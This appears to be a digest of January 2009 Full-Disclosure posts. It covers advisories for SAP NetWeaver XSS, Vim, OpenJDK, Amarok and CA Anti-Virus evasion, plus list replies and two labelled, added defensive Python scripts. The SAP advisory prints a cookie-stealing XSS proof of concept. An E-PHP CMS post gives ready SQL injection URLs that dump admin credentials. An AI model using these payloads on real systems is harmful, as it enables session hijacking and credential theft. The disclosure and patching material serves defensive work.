[Full-disclosure] SAP NetWeaver Cross-Site Scripting
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
# Product: NetWeaver/Web DynPro
# Vendor:  SAP (www.sap.com)
# CVD ID:  CVE-2008-3358
# Subject: Cross-Site Scripting Vulnerability
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Martin Suess martin.su...@csnc.ch
# Date:    January 27th 2009
#

Introduction:
-------------
The vulnerability found targets the SAP NetWeaver portal. It is possible to execute JavaScript code in the browser of a valid user when clicking on a specially crafted URL which can be sent to the user by email. This vulnerability can be used to steal the user's session cookie or redirect him to a phishing website which shows the (faked) login screen and gets his logon credentials as soon as he tries to log in on the faked site.

Affected:
---------
- All tested versions that are vulnerable
  SAP NetWeaver/Web DynPro
  [for detailed Information, see SAP Notification 1235253]

Description:
------------
A specially crafted URL in SAP NetWeaver allows an attacker to launch a Cross-Site Scripting attack. The resulting page contains only the unfiltered value of the vulnerable parameter. It is possible to create a URL which causes the resulting page to contain malicious JavaScript code. A response to such a request could look like the following example:

HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: server
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive

<html><title>test</title><body onload=alert(document.cookie)> </body></html>

The code only gets executed in Microsoft Internet Explorer (tested with version 7.0.5730 only). In Firefox (tested with version 3.0 only) it did not get executed as the content-type header of the server response is interpreted more strictly (text/plain).

SAP Information Policy:
-----------------------
The information is available to registered SAP clients only (SAP Security Notes).

Patches:
--------
Apply the latest SAP security patches for Netweaver.
For more detailed patch information, see SAP notification number 1235253.

Timeline:
---------
Vendor Status:    Patch released
Vendor Notified:  July 21st 2008
Vendor Response:  July 28th 2008
Patch available:  October 2008
Advisory Release: January 27th 2009

References:
-----------
- SAP Notification 1235253 (problem and patches)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] E-PHP cms SQL Injection Vulnerability
E-PHP cms SQL Injection Vulnerability
#
Discovered By: SaiedHacker
Group: HackeranShiraz Security Team
Web Address: www.HackeranShiraz.Com
E-mail: saiedhackeri...@yahoo.com
Creator: http://ephpscripts.com
#
Demo Exploit:
http://ephpscripts.com/demo/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin
#
Exploit:
http://Target/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin
[Full-disclosure] [USN-712-1] Vim vulnerabilities
===
Ubuntu Security Notice USN-712-1           January 27, 2009
vim vulnerabilities
CVE-2008-2712, CVE-2008-4101
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  vim                             1:6.4-006+2ubuntu6.2
  vim-runtime                     1:6.4-006+2ubuntu6.2

Ubuntu 7.10:
  vim                             1:7.1-056+2ubuntu2.1
  vim-runtime                     1:7.1-056+2ubuntu2.1

Ubuntu 8.04 LTS:
  vim                             1:7.1-138+1ubuntu3.1
  vim-runtime                     1:7.1-138+1ubuntu3.1

Ubuntu 8.10:
  vim                             1:7.1.314-3ubuntu3.1
  vim-runtime                     1:7.1.314-3ubuntu3.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Jan Minar discovered that Vim did not properly sanitize inputs before invoking the execute or system functions inside Vim scripts. If a user were tricked into running Vim scripts with a specially crafted input, an attacker could execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2712)

Ben Schmidt discovered that Vim did not properly escape characters when performing keyword or tag lookups. If a user were tricked into running specially crafted commands, an attacker could execute arbitrary code with the privileges of the user invoking the program.
(CVE-2008-4101)

Updated packages for Ubuntu 6.06 LTS:
[Full-disclosure] CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities

CA Advisory Reference: CA20090126-01

CA Advisory Date: 2009-01-26

Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG

Impact: A remote attacker can evade detection.

Summary: The CA Anti-Virus engine contains multiple vulnerabilities that can allow a remote attacker to evade detection by the Anti-Virus engine by creating a malformed archive file in one of several common file archive formats. CA has released a new Anti-Virus engine to address the vulnerabilities. The vulnerabilities, CVE-2009-0042, are due to improper handling of malformed archive files by the Anti-Virus engine. A remote attacker can create a malformed archive file that potentially contains malware and evade anti-virus detection.

Note: After files have been extracted from an archive, the desktop Anti-Virus engine is able to scan all files for malware. Consequently, detection evasion can be a concern for gateway anti-virus software if archives are not scanned, but the risk is effectively mitigated by the desktop anti-virus engine.

Mitigating Factors: See note above.

Severity: CA has given these vulnerabilities a Low risk rating.

Affected Products:
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1, r8, r8.1
CA Anti-Virus 2007 (v8), 2008
eTrust EZ Antivirus r7, r6.1
CA Internet Security Suite 2007 (v3), 2008
CA Internet Security Suite Plus 2008
CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8, 8.1
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
CA Protection Suites r2, r3, r3.1
CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0, 8.1
CA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) r8, 8.1
CA Anti-Spyware 2007, 2008
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0, r3.1, r11, r11.1
CA ARCserve Backup r11.1, r11.5, r12 on Windows
CA ARCserve Backup r11.1, r11.5 Linux
CA ARCserve client agent for Windows
CA eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1, 4.0
CA Common Services (CCS) r11, r11.1
CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)

Non-Affected Products:
CA Anti-Virus engine with arclib version 7.3.0.15 installed

Affected Platforms:
Windows
UNIX
Linux
Solaris
Mac OS X
NetWare

Status and Recommendation:
CA released arclib 7.3.0.15 in September 2008. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.

How to determine if you are affected:

For products on Windows:

1. Using Windows Explorer, locate the file arclib.dll. By default, the file is located in the C:\Program Files\CA\SharedComponents\ScanEngine directory (*).
2. Right click on the file and select Properties.
3. Select the Version tab.
4. If the file version is earlier than indicated below, the installation is vulnerable.

File Name     File Version
arclib.dll    7.3.0.15

*For eTrust Intrusion Detection 2.0 the file is located in Program Files\eTrust\Intrusion Detection\Common, and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in Program Files\CA\Intrusion Detection\Common.

For CA Anti-Virus r8.1 on non-Windows platforms:

Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 7.3.0.15, the installation is vulnerable.

Example compver utility output:

COMPONENT NAME                             VERSION
eTrust Antivirus Arclib Archive Library    7.3.0.15
... (followed by other components)

For reference, the following are file names for arclib on non-Windows operating systems:

Operating System    File name
Solaris             libarclib.so
Linux               libarclib.so
Mac OS X            arclib.bundle

Workaround: Do not open email attachments or download files from untrusted sources.

References (URLs may wrap):

CA Support:
http://support.ca.com/

CA20090126-01: Security Notice for CA Anti-Virus Engine
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197601

Solution Document Reference APARs:
n/a

CA Security Response Blog posting:
CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2009/01/26.aspx

Reported By:
Thierry Zoller and Sergio Alvarez of n.runs AG
http://www.nruns.com/
http://secdev.zoller.lu

CVE References:
CVE-2009-0042 - Anti-Virus detection evasion
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0042

OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release
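The "earlier than 7.3.0.15" check from the advisory, written as a script (an added example, not CA's code): it pulls the Arclib version out of compver output and compares it component by component, because a plain string comparison misorders versions such as 7.3.0.9. The sample outputs and their column layout are constructed for illustration.

```python
import re

FIXED_ARCLIB = "7.3.0.15"  # first non-vulnerable arclib version per the advisory


def parse_version(text):
    """Turn a dotted version such as '7.3.0.15' into a tuple of ints."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable(installed, fixed=FIXED_ARCLIB):
    """True when installed < fixed, compared numerically per component.

    Shorter versions are zero-padded, so '7.3' is treated as '7.3.0.0'.
    """
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


# Matches the Arclib row of compver output (column layout is an assumption).
ARCLIB_ROW = re.compile(r"Arclib Archive Library\s+(\d+(?:\.\d+)+)", re.IGNORECASE)


def arclib_version_from_compver(output):
    """Return the Arclib version string found in compver output, or None."""
    match = ARCLIB_ROW.search(output)
    return match.group(1) if match else None


def check_compver(output):
    """Classify compver output as 'vulnerable', 'patched' or 'unknown'."""
    version = arclib_version_from_compver(output)
    if version is None:
        return "unknown"  # do not report a host as patched without evidence
    return "vulnerable" if is_vulnerable(version) else "patched"


# Constructed sample outputs, modelled on the example in the advisory.
SAMPLE_PATCHED = (
    "COMPONENT NAME                             VERSION\n"
    "eTrust Antivirus Arclib Archive Library    7.3.0.15\n"
)
SAMPLE_OLD = (
    "COMPONENT NAME                             VERSION\n"
    "eTrust Antivirus Arclib Archive Library    7.3.0.9\n"
)

if __name__ == "__main__":
    for name, sample in (("patched host", SAMPLE_PATCHED), ("old host", SAMPLE_OLD)):
        print(name, "->", check_compver(sample))
```

The same `is_vulnerable` comparison applies to the four-part file version read from the arclib.dll Properties dialog on Windows.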
[Full-disclosure] [ MDVSA-2009:030 ] amarok
___

Mandriva Linux Security Advisory                         MDVSA-2009:030
http://www.mandriva.com/security/
___

Package : amarok
Date    : January 26, 2009
Affected: 2008.1, 2009.0
___

Problem Description:

Data length values in metadata Audible Audio media file (.aa) can lead to an integer overflow enabling remote attackers to use it to trigger a heap overflow and enabling the possibility to execute arbitrary code (CVE-2009-0135).

Failure on checking heap allocation on Audible Audio media files (.aa) allows remote attackers either to cause denial of service or execute arbitrary code via a crafted media file (CVE-2009-0136).

This update provides the fix for these security issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0135
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0136
___

Updated Packages:
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can
Re: [Full-disclosure] NO-IP service Flaw
On Tue, 27 Jan 2009 00:41:59 GMT, infoloo...@gmail.com said:
> What if you are sniffing the traffic for any http session the information is submitted in clear text.

If you're traffic sniffing, you'll see the data whether it's GET or POST. The distinction becomes important for things like http proxies and things that log/remember URLs - it's somewhat bad form to leave a userid/password sitting right there in the browser 'recent URLS' list or in a logfile someplace.

If you're passing the data in the URL, at best it can be obfuscated and reversed fairly easily (unless you've got enough Javascript to pop open a dialog window and use an entered value as a salt for encrypting before transmission).

Yes, the proper thing to do here is a POST over https. Personally, I'm surprised that a frikking *domain registrar* is that clueless about basic security (the *biggest* issue in what would otherwise be a pretty minor vulnerability).

Or maybe I'm not, actually.. I wonder what *else* they got wrong?
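The logging side of the GET-versus-POST point in the reply above, as an added example that is not part of the original post: a scrubber that finds password-like query parameters in access-log request lines and redacts them. The parameter names, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameter names treated as secrets (assumed; adjust to the application).
SENSITIVE = {"password", "passwd", "pass", "pwd"}

# Request field of a common-log-format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(GET|POST|HEAD|PUT) (\S+) (HTTP/[\d.]+)"')


def redact_url(url):
    """Return (url with secret values replaced, list of offending names)."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    hits = [name for name, _ in pairs if name.lower() in SENSITIVE]
    if not hits:
        return url, []
    clean = [(n, "REDACTED" if n.lower() in SENSITIVE else v) for n, v in pairs]
    return urlunsplit(parts._replace(query=urlencode(clean))), hits


def scrub_log_line(line):
    """Redact secrets in the request target of one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return line, []
    url, hits = redact_url(match.group(2))
    if not hits:
        return line, []
    return line[:match.start(2)] + url + line[match.end(2):], hits


# Constructed log lines: the same update sent as GET and as POST.
GET_LINE = ('203.0.113.5 - - [27/Jan/2009:00:41:59 +0000] '
            '"GET /update?username=alice&password=s3cret&host=home.example.org '
            'HTTP/1.1" 200 12')
POST_LINE = ('203.0.113.5 - - [27/Jan/2009:00:42:07 +0000] '
             '"POST /update HTTP/1.1" 200 12')

if __name__ == "__main__":
    for raw in (GET_LINE, POST_LINE):
        cleaned, names = scrub_log_line(raw)
        print("leaked:", names or "nothing")
        print(cleaned)
```

With POST the credentials travel in the request body, so the second line carries nothing to redact; redaction only limits what logs retain and does not protect the data in transit.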
Re: [Full-disclosure] Solaris Devs Are Smoking Pot
To block nastygrams like this and others, you should be able to do this with ipfilter rules like this:

echo '@0 block in quick all with short' | ipf -6f -

and/or add said rule to the top of your ipf6.conf file.

Unfortunately the exploit expects you to be using Linux, so I'm somewhat challenged to verify this at present.

Darren
--
Darren Reed darr...@reed.wattle.id.au
[Full-disclosure] (no subject)
Hi, I found that service Flaw on November, I contact them and drop away. Yesterday I was going to burn a cd with tons of txt and found that to be relevant for a disclosure.
[Full-disclosure] [USN-713-1] openjdk-6 vulnerabilities
===
Ubuntu Security Notice USN-713-1           January 27, 2009
openjdk-6 vulnerabilities
CVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354, CVE-2008-5358, CVE-2008-5359, CVE-2008-5360
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 8.10:
  icedtea6-plugin                 6b12-0ubuntu6.1
  openjdk-6-jdk                   6b12-0ubuntu6.1
  openjdk-6-jre                   6b12-0ubuntu6.1
  openjdk-6-jre-headless          6b12-0ubuntu6.1
  openjdk-6-jre-lib               6b12-0ubuntu6.1

After a standard system upgrade you need to restart any Java applications to effect the necessary changes.

Details follow:

It was discovered that Java did not correctly handle untrusted applets. If a user were tricked into running a malicious applet, a remote attacker could gain user privileges, or list directory contents. (CVE-2008-5347, CVE-2008-5350)

It was discovered that Kerberos authentication and RSA public key processing were not correctly handled in Java. A remote attacker could exploit these flaws to cause a denial of service. (CVE-2008-5348, CVE-2008-5349)

It was discovered that Java accepted UTF-8 encodings that might be handled incorrectly by certain applications. A remote attacker could bypass string filters, possibly leading to other exploits. (CVE-2008-5351)

Overflows were discovered in Java JAR processing. If a user or automated system were tricked into processing a malicious JAR file, a remote attacker could crash the application, leading to a denial of service. (CVE-2008-5352, CVE-2008-5354)

It was discovered that Java calendar objects were not unserialized safely. If a user or automated system were tricked into processing a specially crafted calendar object, a remote attacker could execute arbitrary code with user privileges.
(CVE-2008-5353)

It was discovered that the Java image handling code could lead to memory corruption. If a user or automated system were tricked into processing a specially crafted image, a remote attacker could crash the application, leading to a denial of service. (CVE-2008-5358, CVE-2008-5359)

It was discovered that temporary files created by Java had predictable names. If a user or automated system were tricked into processing a specially crafted JAR file, a remote attacker could overwrite sensitive information. (CVE-2008-5360)

Updated packages for Ubuntu 8.10: